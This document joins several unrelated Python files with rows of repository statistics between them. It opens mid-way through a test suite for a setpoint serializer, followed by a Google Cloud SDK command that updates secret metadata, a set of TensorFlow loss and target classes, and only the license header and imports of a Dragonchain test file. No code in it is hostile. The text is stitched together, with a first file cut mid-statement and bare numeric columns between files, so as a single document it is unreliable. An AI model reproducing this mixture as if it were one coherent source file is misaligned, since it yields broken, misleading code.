(key_left_out, data_format)
)
except Exception as e:
caught_execption = e
assert caught_execption is not None
assert caught_execption.status_code == 400
assert "setpoint" in caught_execption.detail
exception_detail = str(caught_execption.detail["setpoint"])
assert key_left_out in exception_detail
#
# This does not work as the SetpointItem class will not pick up
# any unexpected fields.
#
# # Now construct test cases to verify that additional unexpected
# # keys are rejected.
# for data_format in unexpected_keys_per_data_format:
# dp.data_format = data_format
# dp.save()
# unexpected_keys = unexpected_keys_per_data_format[data_format]
# required_keys = required_keys_per_data_format[data_format]
# setpoint = {}
# for unexpected_key in unexpected_keys:
# for key in required_keys:
# setpoint[key] = setpoint_all_fields[key]
# setpoint[unexpected_key] = setpoint_all_fields[unexpected_key]
# test_data = {
# "setpoint": [setpoint],
# "timestamp": timestamp_utc_now(),
# }
# serializer = DatapointSetpointSerializer(dp, data=test_data)
# caught_execption = None
# try:
# serializer.is_valid(raise_exception=True)
# logger.error(
# "Failed to identify unexpected key (%s) while "
# " validating setpoint data for data_format (%s)" %
# (unexpected_key, data_format)
# )
# except Exception as e:
# caught_execption = e
# assert caught_execption is not None
# assert caught_execption.status_code == 400
# assert "setpoint" in caught_execption.detail
# exception_detail = str(caught_execption.detail["setpoint"])
# assert "Found unexpected key" in exception_detail
def test_numeric_value_of_setpoint_validated(self):
"""
Check that for numeric data_formats, only numeric preferred_values are
accepted within setpoints.
"""
dp = self.datapoint
dp.allowed_values = '["not a number"]'
dp.save()
# Here a listing which keys must be given in a setpoint message per
# data_format.
always_required_keys = [
"from_timestamp",
"to_timestamp",
"preferred_value"
]
only_con_keys = [
"min_value",
"max_value"
]
only_dis_keys = [
"acceptable_values"
]
required_keys_per_data_format = {
"generic_numeric": always_required_keys,
"continuous_numeric": always_required_keys + only_con_keys,
"discrete_numeric": always_required_keys + only_dis_keys,
"generic_text": always_required_keys,
"discrete_text": always_required_keys + only_dis_keys,
}
# Here the dummy values for all fields used above.
setpoint_all_fields = {
"from_timestamp": None,
"to_timestamp": timestamp_utc_now() + 1000,
"preferred_value": json.dumps("not a number"),
"acceptable_values": ["not a number"],
"min_value": 20.5,
"max_value": 21.5,
}
numeric_data_formats = [
"generic_numeric",
"continuous_numeric",
"discrete_numeric",
]
for data_format in numeric_data_formats:
dp.data_format = data_format
dp.save()
required_keys = required_keys_per_data_format[data_format]
setpoint = {}
for key in required_keys:
setpoint[key] = setpoint_all_fields[key]
test_data = {
"setpoint": [setpoint],
"timestamp": timestamp_utc_now(),
}
serializer = DatapointSetpointSerializer(dp, data=test_data)
caught_execption = None
try:
serializer.is_valid(raise_exception=True)
logger.error(
"Failed to identify non numeric value while "
"validating setpoint data for data_format (%s)" %
data_format
)
except Exception as e:
caught_execption = e
assert caught_execption is not None
assert caught_execption.status_code == 400
assert "setpoint" in caught_execption.detail
exception_detail = str(caught_execption.detail["setpoint"])
assert "cannot be parsed to float" in exception_detail
# Also verify the oposite, that text values are not rejected
text_data_formats = [
"generic_text",
"discrete_text",
]
for data_format in text_data_formats:
dp.data_format = data_format
dp.save()
required_keys = required_keys_per_data_format[data_format]
setpoint = {}
for key in required_keys:
setpoint[key] = setpoint_all_fields[key]
test_data = {
"setpoint": [setpoint],
"timestamp": timestamp_utc_now(),
}
serializer = DatapointSetpointSerializer(dp, data=test_data)
caught_execption = None
try:
assert serializer.is_valid(raise_exception=True)
except Exception as e:
caught_execption = e
logger.exception("")
assert caught_execption is None
def test_preferred_value_in_min_max(self):
"""
Check that for continous numeric datapoints only those preferred_value
are accepted that reside within the min/max bound, at least if min/max
are set.
"""
dp = self.datapoint
dp.data_format = "continuous_numeric"
dp.save()
valid_combinations = [
{"min": 1.00, "max": 3.00, "preferred_value": 2.00},
{"min": None, "max": None, "preferred_value": 2.00},
{"min": 1.00, "max": 3.00, "preferred_value": None},
{"min": None, "max": 3.00, "preferred_value": 0.00},
{"min": 1.00, "max": None, "preferred_value": 4.00},
]
for valid_combination in valid_combinations:
dp.min_value = valid_combination["min"]
dp.max_value = valid_combination["max"]
dp.save()
test_data = {
"setpoint": [
{
"from_timestamp": None,
"to_timestamp": timestamp_utc_now() + 1000,
"preferred_value":
json.dumps(valid_combination["preferred_value"]),
"min_value": None,
"max_value": None
}
],
"timestamp": timestamp_utc_now(),
}
serializer = DatapointSetpointSerializer(dp, data=test_data)
try:
is_valid = serializer.is_valid(raise_exception=True)
except Exception:
logger.exception(
"test_value_in_min_max failed for valid combination %s",
str(valid_combination)
)
is_valid = False
assert is_valid
invalid_combinations = [
{"min": 1.00, "max": 3.00, "preferred_value": 4.00},
{"min": 1.00, "max": 3.00, "preferred_value": 0.00},
{"min": None, "max": 3.00, "preferred_value": 4.00},
{"min": 1.00, "max": None, "preferred_value": 0.00},
]
for invalid_combination in invalid_combinations:
dp.min_value = invalid_combination["min"]
dp.max_value = invalid_combination["max"]
test_data = {
"setpoint": [
{
"from_timestamp": None,
"to_timestamp": timestamp_utc_now() + 1000,
"preferred_value":
json.dumps(invalid_combination["preferred_value"]),
"min_value": None,
"max_value": None
},
],
"timestamp": timestamp_utc_now(),
}
serializer = DatapointSetpointSerializer(dp, data=test_data)
caught_execption = None
try:
serializer.is_valid(raise_exception=True)
except Exception as e:
caught_execption = e
if caught_execption is None:
logger.error(
"test_value_in_min_max failed for invalid combination %s",
str(invalid_combination)
)
assert caught_execption is not None
assert caught_execption.status_code == 400
assert "setpoint" in caught_execption.detail
exception_detail = str(caught_execption.detail["setpoint"])
assert "numeric datapoint" in exception_detail
def test_preferred_value_in_allowed_values(self):
"""
Check that for discrete valued datapoints only those preferred_value
are accepted that have one of the accepted values.
"""
dp = self.datapoint
valid_combinations = [
{
"preferred_value": 2.0,
"data_format": "discrete_numeric",
"allowed_values": [1.0, 2.0, 3.0]
},
{
"preferred_value": 2,
"data_format": "discrete_numeric",
"allowed_values": [1, 2, 3]
},
{
"preferred_value": "OK",
"data_format": "discrete_text",
"allowed_values": ["OK", "Done"]
},
{
"preferred_value": None,
"data_format": "discrete_text",
"allowed_values": [None, "Nope"]
},
]
for valid_combination in valid_combinations:
dp.data_format = valid_combination["data_format"]
dp.allowed_values = valid_combination["allowed_values"]
dp.save()
test_data = {
"setpoint": [
{
"from_timestamp": None,
"to_timestamp": timestamp_utc_now() + 1000,
"preferred_value":
json.dumps(valid_combination["preferred_value"]),
"acceptable_values":
[valid_combination["preferred_value"]]
}
],
"timestamp": timestamp_utc_now(),
}
serializer = DatapointSetpointSerializer(dp, data=test_data)
try:
is_valid = serializer.is_valid(raise_exception=True)
except Exception:
logger.exception(
"test_preferred_value_in_allowed_values failed for valid "
"combination %s",
str(valid_combination)
)
is_valid = False
assert is_valid
invalid_combinations = [
{
"preferred_value": 2.0,
"data_format": "discrete_numeric",
"allowed_values": [1.0, 3.0]
},
{
"preferred_value": 2,
"data_format": "discrete_numeric",
"allowed_values": [1, 3]
},
{
"preferred_value": 2,
"data_format": "discrete_numeric",
"allowed_values": []
},
{
"preferred_value": "OK",
"data_format": "discrete_text",
"allowed_values": ["NotOK", "OK "]
},
{
"preferred_value": "",
"data_format": "discrete_text",
"allowed_values": ["OK"]
},
{
"preferred_value": None,
"data_format": "discrete_text",
"allowed_values": ["OK"]
},
]
for invalid_combination in invalid_combinations:
dp.data_format = invalid_combination["data_format"]
dp.allowed_values = invalid_combination["allowed_values"]
dp.save()
test_data = {
"setpoint": [
{
"from_timestamp": None,
"to_timestamp": timestamp_utc_now() + 1000,
"preferred_value":
json.dumps(invalid_combination["preferred_value"]),
"acceptable_values":
[invalid_combination["preferred_value"]]
}
],
"timestamp": timestamp_utc_now(),
}
serializer = DatapointSetpointSerializer(dp, data=test_data)
caught_execption = None
try:
serializer.is_valid(raise_exception=True)
except Exception as e:
caught_execption = e
if caught_execption is None:
logger.exception(
"test_value_in_allowed_values failed for invalid "
"combination %s",
str(valid_combination)
)
assert caught_execption is not None
assert caught_execption.status_code == 400
assert "setpoint" in caught_execption.detail
exception_detail = str(caught_execption.detail["setpoint"])
assert "preferred_value" in exception_detail
def test_timestamps_are_validated_against_each_other(self):
"""
Check that if from_timestamp and to_timestamp is set not None,
it is validated that to_timestamp is larger.
"""
dp = self.datapoint
dp.save()
test_data = {
"setpoint": [
{
"from_timestamp": timestamp_utc_now(),
"to_timestamp": timestamp_utc_now() - 1000,
"preferred_value": json.dumps("not a number")
},
],
"timestamp": timestamp_utc_now(),
}
serializer = DatapointSetpointSerializer(dp, data=test_data)
caught_execption = None
try:
serializer.is_valid(raise_exception=True)
except Exception as e:
caught_execption = e
assert caught_execption is not None
assert caught_execption.status_code == 400
assert "setpoint" in caught_execption.detail
exception_detail = str(caught_execption.detail["setpoint"])
assert "timestamp must be larger" in exception_detail
def test_timestamps_are_validated_to_be_numbers(self):
"""
Check that if from_timestamp and to_timestamp are validated to be
None or convertable to a number.
"""
dp = self.datapoint
dp.save()
test_data = {
"setpoint": [
{
"from_timestamp": None,
"to_timestamp": "not 1564489613491",
"preferred_value": json.dumps("not a number")
}
],
"timestamp": timestamp_utc_now(),
}
serializer = DatapointSetpointSerializer(dp, data=test_data)
caught_execption = None
try:
serializer.is_valid(raise_exception=True)
except Exception as e:
caught_execption = e
assert caught_execption is not None
assert caught_execption.status_code == 400
assert "setpoint" in caught_execption.detail
exception_detail = str(caught_execption.detail["setpoint"])
assert "integer" in exception_detail
test_data = {
"setpoint": [
{
"from_timestamp": "not 1564489613491",
"to_timestamp": None,
"preferred_value": "not a number"
}
],
"timestamp": timestamp_utc_now(),
}
serializer = DatapointSetpointSerializer(dp, data=test_data)
caught_execption = None
try:
serializer.is_valid(raise_exception=True)
except Exception as e:
caught_execption = e
assert caught_execption is not None
assert caught_execption.status_code == 400
assert "setpoint" in caught_execption.detail
exception_detail = str(caught_execption.detail["setpoint"])
assert "integer" in exception_detail
def test_timestamps_not_in_milliseconds_yield_error(self):
"""
Check that an error message is yielded if the timestamp is in
obviously not in milliseconds.
"""
dp = self.datapoint
dp.save()
# timestamp in seconds.
test_data = {
"setpoint": [
{
"from_timestamp": None,
"to_timestamp": round(timestamp_utc_now() / 1000),
"preferred_value": json.dumps("not a number")
}
],
"timestamp": timestamp_utc_now(),
}
serializer = DatapointSetpointSerializer(dp, data=test_data)
caught_execption = None
try:
serializer.is_valid(raise_exception=True)
except Exception as e:
caught_execption = e
assert caught_execption is not None
assert caught_execption.status_code == 400
assert "setpoint" in caught_execption.detail
exception_detail = str(caught_execption.detail["setpoint"])
assert "seems unreasonably low" in exception_detail
test_data = {
"setpoint": [
{
"from_timestamp": round(timestamp_utc_now() / 1000),
"to_timestamp": None,
"preferred_value": json.dumps("not a number")
}
],
"timestamp": timestamp_utc_now(),
}
serializer = DatapointSetpointSerializer(dp, data=test_data)
caught_execption = None
try:
serializer.is_valid(raise_exception=True)
except Exception as e:
caught_execption = e
assert caught_execption is not None
assert caught_execption.status_code == 400
assert "setpoint" in caught_execption.detail
exception_detail = str(caught_execption.detail["setpoint"])
assert "seems unreasonably low" in exception_detail
# timestamp in microseconds.
test_data = {
"setpoint": [
{
"from_timestamp": None,
"to_timestamp": round(timestamp_utc_now() * 1000),
"preferred_value": json.dumps("not a number")
}
],
"timestamp": timestamp_utc_now(),
}
serializer = DatapointSetpointSerializer(dp, data=test_data)
caught_execption = None
try:
serializer.is_valid(raise_exception=True)
except Exception as e:
caught_execption = e
assert caught_execption is not None
assert caught_execption.status_code == 400
assert "setpoint" in caught_execption.detail
exception_detail = str(caught_execption.detail["setpoint"])
assert "seems unreasonably high" in exception_detail
test_data = {
"setpoint": [
{
"from_timestamp": round(timestamp_utc_now() * 1000),
"to_timestamp": None,
"preferred_value": json.dumps("not a number")
}
],
"timestamp": timestamp_utc_now(),
}
serializer = DatapointSetpointSerializer(dp, data=test_data)
caught_execption = None
try:
serializer.is_valid(raise_exception=True)
except Exception as e:
caught_execption = e
assert caught_execption is not None
assert caught_execption.status_code == 400
assert "setpoint" in caught_execption.detail
exception_detail = str(caught_execption.detail["setpoint"])
assert "seems unreasonably high" in exception_detail
| 35.834879
| 80
| 0.545625
| 7,432
| 77,260
| 5.423708
| 0.043326
| 0.088938
| 0.035724
| 0.048823
| 0.928403
| 0.915999
| 0.909251
| 0.888834
| 0.874668
| 0.858344
| 0
| 0.013164
| 0.371732
| 77,260
| 2,155
| 81
| 35.851508
| 0.817264
| 0.133122
| 0
| 0.771357
| 0
| 0
| 0.118971
| 0.007186
| 0
| 0
| 0
| 0
| 0.104271
| 1
| 0.028266
| false
| 0
| 0.007538
| 0
| 0.045226
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ac50cde3638ea63bce65d7c65972c507072d12a1
| 11,404
|
py
|
Python
|
lib/surface/secrets/update.py
|
google-cloud-sdk-unofficial/google-cloud-sdk
|
2a48a04df14be46c8745050f98768e30474a1aac
|
[
"Apache-2.0"
] | 2
|
2019-11-10T09:17:07.000Z
|
2019-12-18T13:44:08.000Z
|
lib/surface/secrets/update.py
|
google-cloud-sdk-unofficial/google-cloud-sdk
|
2a48a04df14be46c8745050f98768e30474a1aac
|
[
"Apache-2.0"
] | null | null | null |
lib/surface/secrets/update.py
|
google-cloud-sdk-unofficial/google-cloud-sdk
|
2a48a04df14be46c8745050f98768e30474a1aac
|
[
"Apache-2.0"
] | 1
|
2020-07-25T01:40:19.000Z
|
2020-07-25T01:40:19.000Z
|
# -*- coding: utf-8 -*- #
# Copyright 2019 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Update an existing secret."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from googlecloudsdk.api_lib.secrets import api as secrets_api
from googlecloudsdk.calliope import base
from googlecloudsdk.calliope import exceptions
from googlecloudsdk.command_lib.secrets import args as secrets_args
from googlecloudsdk.command_lib.secrets import log as secrets_log
from googlecloudsdk.command_lib.secrets import util as secrets_util
from googlecloudsdk.command_lib.util.args import labels_util
from googlecloudsdk.core.console import console_io
@base.ReleaseTracks(base.ReleaseTrack.GA)
class Update(base.UpdateCommand):
r"""Update a secret's metadata.
Update a secret's metadata (e.g. labels). This command will
return an error if given a secret that does not exist.
## EXAMPLES
Update the label of a secret named 'my-secret'.
$ {command} my-secret --update-labels=foo=bar
Update the label of a secret using an etag.
$ {command} my-secret --update-labels=foo=bar --etag=\"123\"
Update a secret to have a next-rotation-time:
$ {command} my-secret --next-rotation-time="2030-01-01T15:30:00-05:00"
Update a secret to have a next-rotation-time and rotation-period:
$ {command} my-secret --next-rotation-time="2030-01-01T15:30:00-05:00"
--rotation-period="7200s"
Update a secret to remove the next-rotation-time:
$ {command} my-secret --remove-next-rotation-time
Update a secret to clear rotation policy:
$ {command} my-secret --remove-rotation-schedule
"""
NO_CHANGES_MESSAGE = (
'There are no changes to the secret [{secret}] for update.')
SECRET_MISSING_MESSAGE = (
'The secret [{secret}] cannot be updated because it does not exist. '
'Please use the create command to create a new secret.')
CONFIRM_EXPIRE_TIME_MESSAGE = (
'This secret and all of its versions will be automatically deleted at '
'the requested expire-time of [{expire_time}].')
CONFIRM_TTL_MESSAGE = (
'This secret and all of its versions will be automatically deleted '
'after the requested ttl of [{ttl}] has elapsed.')
@staticmethod
def Args(parser):
secrets_args.AddSecret(
parser, purpose='to update', positional=True, required=True)
labels_util.AddUpdateLabelsFlags(parser)
secrets_args.AddSecretEtag(parser)
secrets_args.AddUpdateExpirationGroup(parser)
secrets_args.AddUpdateTopicsGroup(parser)
secrets_args.AddUpdateRotationGroup(parser)
def _RunUpdate(self, original, args):
messages = secrets_api.GetMessages()
secret_ref = args.CONCEPTS.secret.Parse()
# Collect the list of update masks
update_mask = []
labels_diff = labels_util.Diff.FromUpdateArgs(args)
if labels_diff.MayHaveUpdates():
update_mask.append('labels')
if args.IsSpecified('ttl'):
update_mask.append('ttl')
if args.IsSpecified('expire_time') or args.IsSpecified('remove_expiration'):
update_mask.append('expire_time')
if ((args.IsSpecified('next_rotation_time') or
args.IsSpecified('remove_next_rotation_time')) or
args.IsSpecified('remove_rotation_schedule')):
update_mask.append('rotation.next_rotation_time')
if ((args.IsSpecified('rotation_period') or
args.IsSpecified('remove_rotation_period')) or
args.IsSpecified('remove_rotation_schedule')):
update_mask.append('rotation.rotation_period')
if args.IsSpecified('add_topics') or args.IsSpecified(
'remove_topics') or args.IsSpecified('clear_topics'):
update_mask.append('topics')
# Validations
if not update_mask:
raise exceptions.MinimumArgumentException([
'--clear-labels', '--remove-labels', '--update-labels', '--ttl',
'--expire-time', '--remove-expiration', '--clear-topics',
'--remove-topics', '--add-topics', '--next-rotation-time',
'--remove-next-rotation-time', '--rotation-period',
'--remove-rotation-period', '--remove-rotation-schedule'
], self.NO_CHANGES_MESSAGE.format(secret=secret_ref.Name()))
labels_update = labels_diff.Apply(messages.Secret.LabelsValue,
original.labels)
labels = original.labels
if labels_update.needs_update:
labels = labels_update.labels
if args.expire_time:
msg = self.CONFIRM_EXPIRE_TIME_MESSAGE.format(
expire_time=args.expire_time)
console_io.PromptContinue(
msg, throw_if_unattended=True, cancel_on_no=True)
if args.ttl:
msg = self.CONFIRM_TTL_MESSAGE.format(ttl=args.ttl)
console_io.PromptContinue(
msg, throw_if_unattended=True, cancel_on_no=True)
if 'topics' in update_mask:
topics = secrets_util.ApplyTopicsUpdate(args, original.topics)
else:
topics = []
secret = secrets_api.Secrets().Update(
secret_ref=secret_ref,
labels=labels,
update_mask=update_mask,
etag=args.etag,
expire_time=args.expire_time,
ttl=args.ttl,
topics=topics,
next_rotation_time=args.next_rotation_time,
rotation_period=args.rotation_period)
secrets_log.Secrets().Updated(secret_ref)
return secret
def Run(self, args):
secret_ref = args.CONCEPTS.secret.Parse()
# Attempt to get the secret
secret = secrets_api.Secrets().GetOrNone(secret_ref)
# Secret does not exist
if secret is None:
raise exceptions.InvalidArgumentException(
'secret',
self.SECRET_MISSING_MESSAGE.format(secret=secret_ref.Name()))
# The secret exists, update it
return self._RunUpdate(secret, args)
@base.ReleaseTracks(base.ReleaseTrack.BETA)
class UpdateBeta(Update):
r"""Update a secret's metadata.
Update a secret's metadata (e.g. labels). This command will
return an error if given a secret that does not exist.
## EXAMPLES
Update the label of a secret named 'my-secret'.
$ {command} my-secret --update-labels=foo=bar
Update the label of a secret using etag.
$ {command} my-secret --update-labels=foo=bar --etag=\"123\"
Update the expiration of a secret named 'my-secret' using a ttl.
$ {command} my-secret --ttl="600s"
Update the expiration of a secret named 'my-secret' using an expire-time.
$ {command} my-secret --expire-time="2030-01-01T08:15:30-05:00"
Remove the expiration of a secret named 'my-secret'.
$ {command} my-secret --remove-expiration
Update a secret to have a next-rotation-time:
$ {command} my-secret --next-rotation-time="2030-01-01T15:30:00-05:00"
Update a secret to have a next-rotation-time and rotation-period:
$ {command} my-secret --next-rotation-time="2030-01-01T15:30:00-05:00"
--rotation-period="7200s"
Update a secret to remove the next-rotation-time:
$ {command} my-secret --remove-next-rotation-time
Update a secret to clear rotation policy:
$ {command} my-secret --remove-rotation-schedule
"""
NO_CHANGES_MESSAGE = (
'There are no changes to the secret [{secret}] for update')
@staticmethod
def Args(parser):
secrets_args.AddSecret(
parser, purpose='to update', positional=True, required=True)
labels_util.AddUpdateLabelsFlags(parser)
secrets_args.AddSecretEtag(parser)
secrets_args.AddUpdateExpirationGroup(parser)
secrets_args.AddUpdateRotationGroup(parser)
secrets_args.AddUpdateTopicsGroup(parser)
def _RunUpdate(self, original, args):
messages = secrets_api.GetMessages()
secret_ref = args.CONCEPTS.secret.Parse()
# Collect the list of update masks
update_mask = []
labels_diff = labels_util.Diff.FromUpdateArgs(args)
if labels_diff.MayHaveUpdates():
update_mask.append('labels')
if args.IsSpecified('ttl'):
update_mask.append('ttl')
if args.IsSpecified('expire_time') or args.IsSpecified('remove_expiration'):
update_mask.append('expire_time')
if args.IsSpecified('add_topics') or args.IsSpecified(
'remove_topics') or args.IsSpecified('clear_topics'):
update_mask.append('topics')
if ((args.IsSpecified('next_rotation_time') or
args.IsSpecified('remove_next_rotation_time')) or
args.IsSpecified('remove_rotation_schedule')):
update_mask.append('rotation.next_rotation_time')
if ((args.IsSpecified('rotation_period') or
args.IsSpecified('remove_rotation_period')) or
args.IsSpecified('remove_rotation_schedule')):
update_mask.append('rotation.rotation_period')
# Validations
if not update_mask:
raise exceptions.MinimumArgumentException([
'--clear-labels', '--remove-labels', '--update-labels', '--ttl',
'--expire-time', '--remove-expiration', '--next-rotation-time',
'--remove-next-rotation-time', '--rotation-period',
'--remove-rotation-period', '--remove-rotation-schedule',
'--clear-topics', '--remove-topics', '--add-topics'
], self.NO_CHANGES_MESSAGE.format(secret=secret_ref.Name()))
labels_update = labels_diff.Apply(messages.Secret.LabelsValue,
original.labels)
labels = original.labels
if labels_update.needs_update:
labels = labels_update.labels
if 'topics' in update_mask:
topics = secrets_util.ApplyTopicsUpdate(args, original.topics)
else:
topics = []
if args.expire_time:
msg = self.CONFIRM_EXPIRE_TIME_MESSAGE.format(
expire_time=args.expire_time)
console_io.PromptContinue(
msg, throw_if_unattended=True, cancel_on_no=True)
if args.ttl:
msg = self.CONFIRM_TTL_MESSAGE.format(ttl=args.ttl)
console_io.PromptContinue(
msg, throw_if_unattended=True, cancel_on_no=True)
secret = secrets_api.Secrets().Update(
secret_ref=secret_ref,
labels=labels,
update_mask=update_mask,
etag=args.etag,
expire_time=args.expire_time,
ttl=args.ttl,
topics=topics,
next_rotation_time=args.next_rotation_time,
rotation_period=args.rotation_period)
secrets_log.Secrets().Updated(secret_ref)
return secret
def Run(self, args):
secret_ref = args.CONCEPTS.secret.Parse()
# Attempt to get the secret
secret = secrets_api.Secrets().GetOrNone(secret_ref)
# Secret does not exist
if secret is None:
raise exceptions.InvalidArgumentException(
'secret',
self.SECRET_MISSING_MESSAGE.format(secret=secret_ref.Name()))
# The secret exists, update it
return self._RunUpdate(secret, args)
| 34.874618
| 80
| 0.690986
| 1,435
| 11,404
| 5.338676
| 0.154007
| 0.040726
| 0.054301
| 0.036027
| 0.832137
| 0.816734
| 0.792325
| 0.792325
| 0.790628
| 0.785798
| 0
| 0.012744
| 0.201859
| 11,404
| 326
| 81
| 34.981595
| 0.828939
| 0.255261
| 0
| 0.815217
| 0
| 0
| 0.184451
| 0.054265
| 0
| 0
| 0
| 0
| 0
| 1
| 0.032609
| false
| 0
| 0.059783
| 0
| 0.152174
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ac6a322ae63cd9b4b7159a51d97ed1e33eb70a83
| 4,781
|
py
|
Python
|
ml/module/target.py
|
xiaoshenxian/mlxsx
|
a20558482f0d71bdd099aaff8be16ac29d4b98e2
|
[
"Apache-2.0"
] | 2
|
2019-06-16T03:06:52.000Z
|
2019-06-21T03:38:12.000Z
|
ml/module/target.py
|
xiaoshenxian/mlxsx
|
a20558482f0d71bdd099aaff8be16ac29d4b98e2
|
[
"Apache-2.0"
] | null | null | null |
ml/module/target.py
|
xiaoshenxian/mlxsx
|
a20558482f0d71bdd099aaff8be16ac29d4b98e2
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
import tensorflow as tf
class TargetOp:
def build_mid(self, input_data, initializer=None, regularizer=None, name=None):
pass
def build_training(self, input_data, initializer=None, regularizer=None, name=None):
pass
def build_inference(self, input_data, initializer=None, regularizer=None, name=None):
pass
def _get_init(self, initializer=None, regularizer=None):
scope=tf.get_variable_scope()
return (scope.initializer if initializer is None else initializer), (scope.regularizer if regularizer is None else regularizer)
class RegressionTargetOp(TargetOp):
def __init__(self, build_mid_func=None):
self.build_mid_func=build_mid_func
def build_mid(self, input_data, initializer=None, regularizer=None, name=None):
initializer, regularizer=self._get_init(initializer, regularizer)
if self.build_mid_func is None:
return tf.layers.dense(input_data, 1, kernel_initializer=initializer, kernel_regularizer=regularizer, name=name)
else:
return self.build_mid_func(input_data, initializer, regularizer, name=name)
def build_training(self, input_data, initializer=None, regularizer=None, name=None):
targets, predicts=input_data
return tf.square(predicts-targets, name=name)
def build_inference(self, input_data, initializer=None, regularizer=None, name=None):
return input_data
class LrTargetOp(TargetOp):
def __init__(self, build_mid_func=None):
self.build_mid_func=build_mid_func
def build_mid(self, input_data, initializer=None, regularizer=None, name=None):
initializer, regularizer=self._get_init(initializer, regularizer)
if self.build_mid_func is None:
return tf.layers.dense(input_data, 1, kernel_initializer=initializer, kernel_regularizer=regularizer, name=name)
else:
return self.build_mid_func(input_data, initializer, regularizer, name=name)
def build_training(self, input_data, initializer=None, regularizer=None, name=None):
targets, logits=input_data
return tf.nn.sigmoid_cross_entropy_with_logits(labels=targets, logits=logits, name=name)
def build_inference(self, input_data, initializer=None, regularizer=None, name=None):
return tf.nn.sigmoid(input_data, name=name)
class SoftmaxTargetOp(TargetOp):
def __init__(self, result_shape, top_k, sparse_target=False, build_mid_func=None):
self.result_shape=result_shape
self.top_k=top_k
self.sparse_target=sparse_target
self.build_mid_func=build_mid_func
def build_mid(self, input_data, initializer=None, regularizer=None, name=None):
initializer, regularizer=self._get_init(initializer, regularizer)
if self.build_mid_func is None:
return tf.layers.dense(input_data, self.result_shape, kernel_initializer=initializer, kernel_regularizer=regularizer, name=name)
else:
return self.build_mid_func(input_data, initializer, regularizer, name=name)
def build_training(self, input_data, initializer=None, regularizer=None, name=None):
targets, logits=input_data
if self.sparse_target:
return tf.nn.sparse_softmax_cross_entropy_with_logits(labels=targets, logits=logits, name=name)
else:
return tf.nn.softmax_cross_entropy_with_logits(labels=targets, logits=logits, name=name)
def build_inference(self, input_data, initializer=None, regularizer=None, name=None):
val, idx=tf.nn.top_k(tf.nn.softmax(input_data, name=name), k=self.top_k)
return val, idx
class RankNetTargetOp(TargetOp):
def __init__(self, build_mid_func=None):
self.build_mid_func=build_mid_func
def build_mid(self, input_data, initializer=None, regularizer=None, name=None):
initializer, regularizer=self._get_init(initializer, regularizer)
if self.build_mid_func is None:
return tf.layers.dense(input_data, 1, kernel_initializer=initializer, kernel_regularizer=regularizer, name=name)
else:
return self.build_mid_func(input_data, initializer, regularizer, name=name)
def build_training(self, input_data, initializer=None, regularizer=None, name=None):
targets, logits=input_data
self.targets=tf.subtract(targets[:-1], targets[1:])
self.targets=tf.truediv(1.0, 1.0+tf.exp(-self.targets), name='targets')
self.logits=tf.subtract(logits[:-1], logits[1:], name='logits')
return tf.nn.sigmoid_cross_entropy_with_logits(labels=self.targets, logits=self.logits, name=name)
def build_inference(self, input_data, initializer=None, regularizer=None, name=None):
return tf.sigmoid(input_data, name=name)
| 47.81
| 140
| 0.7283
| 635
| 4,781
| 5.244094
| 0.099213
| 0.083784
| 0.072072
| 0.144144
| 0.777778
| 0.757357
| 0.757357
| 0.757357
| 0.757357
| 0.738739
| 0
| 0.003039
| 0.174022
| 4,781
| 99
| 141
| 48.292929
| 0.840213
| 0.004392
| 0
| 0.623377
| 0
| 0
| 0.002732
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25974
| false
| 0.038961
| 0.012987
| 0.038961
| 0.571429
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
ac76bc531c3f5b943ca4ca8ac0872f28bc468c89
| 29,025
|
py
|
Python
|
dragonchain/broadcast_processor/broadcast_processor_utest.py
|
cheeseandcereal/dragonchain
|
34d34e344b887c2a0eeb591ede2015cc2506a323
|
[
"Apache-2.0"
] | null | null | null |
dragonchain/broadcast_processor/broadcast_processor_utest.py
|
cheeseandcereal/dragonchain
|
34d34e344b887c2a0eeb591ede2015cc2506a323
|
[
"Apache-2.0"
] | null | null | null |
dragonchain/broadcast_processor/broadcast_processor_utest.py
|
cheeseandcereal/dragonchain
|
34d34e344b887c2a0eeb591ede2015cc2506a323
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2020 Dragonchain, Inc.
# Licensed under the Apache License, Version 2.0 (the "Apache License")
# with the following modification; you may not use this file except in
# compliance with the Apache License and the following modification to it:
# Section 6. Trademarks. is deleted and replaced with:
# 6. Trademarks. This License does not grant permission to use the trade
# names, trademarks, service marks, or product names of the Licensor
# and its affiliates, except as required to comply with Section 4(c) of
# the License and to reproduce the content of the NOTICE file.
# You may obtain a copy of the Apache License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the Apache License with the above modification is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the Apache License for the specific
# language governing permissions and limitations under the Apache License.
import importlib
import asyncio
import unittest
from unittest.mock import patch, MagicMock, AsyncMock
from dragonchain import test_env # noqa: F401
from dragonchain.broadcast_processor import broadcast_processor
from dragonchain import exceptions
